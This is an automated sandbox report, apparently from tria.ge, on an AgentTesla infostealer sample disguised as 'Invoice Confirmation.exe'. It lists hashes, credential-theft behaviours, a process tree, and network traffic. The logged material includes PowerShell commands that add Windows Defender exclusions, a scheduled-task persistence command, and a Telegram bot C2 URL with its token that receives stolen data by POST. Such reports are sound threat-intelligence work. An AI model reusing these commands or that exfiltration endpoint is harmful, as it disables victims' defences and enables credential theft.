Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

03/01/2025, 23:07 UTC

250103-2344xa1kcj 10

03/01/2025, 12:42 UTC

250103-pxdcsatray 10

03/01/2025, 12:26 UTC

250103-pmhvhstlhw 10

Analysis

  • max time kernel
    129s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/01/2025, 23:07 UTC

General

  • Target

    Invoice Confirmation.exe

  • Size

    810.6MB

  • MD5

    63395033fc8d13ddd17e74e4bb13d5d6

  • SHA1

    0a65c313504c8bcac8dc2eec944dd078a71ce384

  • SHA256

    c322c179201974d21315230539606d1292a9159527f3f2eafa9d6167e8f51ae2

  • SHA512

    4a1eb33f370ac2ba32bea1af287abe753edfa63e493e9045960303b1990c1cbdb289dd3ebd273ff87ad68b912b4e016877dd3f78b8ed5ce373a3f20b581a0718

  • SSDEEP

    12288:mIR4R52J+XtyfG+Lzb6C65feSfSecDAMEnLwh8aFfxc1C0rmZdXm8qzd9p2MIR:mIeeJfG+LNzecKiVfaBiHXU9pTI

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe
    "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1416
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\KmihxwKU.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3264
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KmihxwKU" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF8A8.tmp"
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2944
    • C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe
      "C:\Users\Admin\AppData\Local\Temp\Invoice Confirmation.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:932

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    Invoice Confirmation.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    POST
    https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument
    Invoice Confirmation.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dd2c4ba442040d
    Host: api.telegram.org
    Content-Length: 1366
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 03 Jan 2025 23:09:16 GMT
    Content-Type: application/json
    Content-Length: 665
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    60.153.16.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    60.153.16.2.in-addr.arpa
    IN PTR
    Response
    60.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-60deploystaticakamaitechnologiescom
  • flag-us
    DNS
    14.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.220:443
    https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument
    tls, http
    Invoice Confirmation.exe
    2.6kB
    7.5kB
    13
    13

    HTTP Request

    POST https://api.telegram.org/bot6882044231:AAEdfz6RtcLc5FDAwOwS8UYabnK3tQ7x4bs/sendDocument

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    22.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    22.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    68.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    68.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    Invoice Confirmation.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    60.153.16.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    60.153.16.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    d3ee5b8c34d47fdc5b3407743bbfb136

    SHA1

    4042198bbfba3eb1850872c3de6f9a7c5c331d49

    SHA256

    f2aaeb43bb24ef459c74487a1aea4d3d3b2022450d67d5dcaafe1b35d46935de

    SHA512

    08e3ee2c3a93bf00dd55025d37dd57d8b7054595a0d7507d880f332a9288442ee741c12ced21eeaeb41f105928ee2904b4adfa425a5a18702085a89df186369a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojndrlxr.eih.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmpF8A8.tmp

    Filesize

    1KB

    MD5

    1a2efb5507274ad2c494a298ce17bfb2

    SHA1

    f9969c524facbc67f4cdbe3100c14bb7b305debe

    SHA256

    2913f8fe0f302ee680bda8389e14d7f64b7327bfd7e8bd11b80f4e9e6db9b1aa

    SHA512

    ced88f5d6097d6b04605eb0725730a6ba9e3733e23d34ff417a90cde231087186b692f3e62de711fbb1faf6fd22cf9a2d51b9538c1a6f73deceee01efcafe771

  • memory/932-90-0x0000000006530000-0x0000000006580000-memory.dmp

    Filesize

    320KB

  • memory/932-48-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/1416-67-0x0000000007AF0000-0x0000000007B86000-memory.dmp

    Filesize

    600KB

  • memory/1416-68-0x0000000007A70000-0x0000000007A81000-memory.dmp

    Filesize

    68KB

  • memory/1416-85-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/1416-82-0x0000000007B90000-0x0000000007B98000-memory.dmp

    Filesize

    32KB

  • memory/1416-81-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

    Filesize

    104KB

  • memory/1416-12-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/1416-13-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/1416-11-0x0000000002C20000-0x0000000002C56000-memory.dmp

    Filesize

    216KB

  • memory/1416-14-0x0000000005620000-0x0000000005C48000-memory.dmp

    Filesize

    6.2MB

  • memory/1416-15-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/1416-16-0x0000000005D80000-0x0000000005DA2000-memory.dmp

    Filesize

    136KB

  • memory/1416-18-0x0000000005E90000-0x0000000005EF6000-memory.dmp

    Filesize

    408KB

  • memory/1416-80-0x0000000007AB0000-0x0000000007AC4000-memory.dmp

    Filesize

    80KB

  • memory/1416-17-0x0000000005E20000-0x0000000005E86000-memory.dmp

    Filesize

    408KB

  • memory/1416-28-0x0000000006000000-0x0000000006354000-memory.dmp

    Filesize

    3.3MB

  • memory/1416-29-0x0000000006510000-0x000000000652E000-memory.dmp

    Filesize

    120KB

  • memory/1416-30-0x0000000006540000-0x000000000658C000-memory.dmp

    Filesize

    304KB

  • memory/1416-79-0x0000000007AA0000-0x0000000007AAE000-memory.dmp

    Filesize

    56KB

  • memory/1416-66-0x00000000078E0000-0x00000000078EA000-memory.dmp

    Filesize

    40KB

  • memory/1416-65-0x0000000007870000-0x000000000788A000-memory.dmp

    Filesize

    104KB

  • memory/1416-64-0x0000000007EB0000-0x000000000852A000-memory.dmp

    Filesize

    6.5MB

  • memory/1416-63-0x0000000007750000-0x00000000077F3000-memory.dmp

    Filesize

    652KB

  • memory/1416-62-0x0000000006AE0000-0x0000000006AFE000-memory.dmp

    Filesize

    120KB

  • memory/1416-51-0x0000000006B30000-0x0000000006B62000-memory.dmp

    Filesize

    200KB

  • memory/1416-52-0x000000006FBB0000-0x000000006FBFC000-memory.dmp

    Filesize

    304KB

  • memory/2784-8-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/2784-4-0x00000000059A0000-0x00000000059AA000-memory.dmp

    Filesize

    40KB

  • memory/2784-1-0x0000000000F30000-0x0000000000FE6000-memory.dmp

    Filesize

    728KB

  • memory/2784-5-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/2784-50-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/2784-0-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

    Filesize

    4KB

  • memory/2784-7-0x0000000074BDE000-0x0000000074BDF000-memory.dmp

    Filesize

    4KB

  • memory/2784-2-0x0000000006080000-0x0000000006624000-memory.dmp

    Filesize

    5.6MB

  • memory/2784-3-0x00000000059B0000-0x0000000005A42000-memory.dmp

    Filesize

    584KB

  • memory/2784-6-0x0000000005D80000-0x0000000005D98000-memory.dmp

    Filesize

    96KB

  • memory/2784-10-0x0000000009990000-0x0000000009A2C000-memory.dmp

    Filesize

    624KB

  • memory/2784-9-0x00000000074C0000-0x0000000007546000-memory.dmp

    Filesize

    536KB

  • memory/3264-36-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/3264-35-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/3264-69-0x000000006FBB0000-0x000000006FBFC000-memory.dmp

    Filesize

    304KB

  • memory/3264-89-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

  • memory/3264-47-0x0000000074BD0000-0x0000000075380000-memory.dmp

    Filesize

    7.7MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.